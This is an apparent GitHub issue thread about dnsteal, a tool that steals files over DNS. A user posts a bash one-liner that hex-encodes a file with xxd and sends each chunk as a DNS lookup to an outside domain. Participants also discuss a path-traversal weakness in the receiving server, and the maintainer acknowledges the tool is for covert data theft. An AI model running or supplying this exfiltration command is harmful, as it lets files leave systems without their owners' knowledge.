### ISSUE TITLE
Feature request

### ISSUE THREAD

**Issue by nemanjan00** [m57/dnsteal#2]
I had another idea... Now, I use dnsteal as a NameServer... 

https://github.com/nemanjan00/dnsteal

`bash
for b in $(xxd -p /path/to/file); do dig +short $b.filename.ext.sacuvaj.ga ; done
`

**Comment by nemanjan00** [comment]
Also, you can not be shure a valid DNS query was recieved so something like "../file" can be passed... 
I am still working on that one in my version...

**Comment by m57** [comment]
hi thanks for the request, however the current version already supports this. Requesting 0102030405.filename.com will save the bytes "0102030405" to the file "filename". I will add support for an extension at a later date. As for using it as a DNS... it already does this functionality, and only people who are doing the bad things are going to use this so I wouldn’t worry about the "../file" attack, which I think is what you are referring to. Ill fix that now.

**Comment by m57** [comment]
Done.
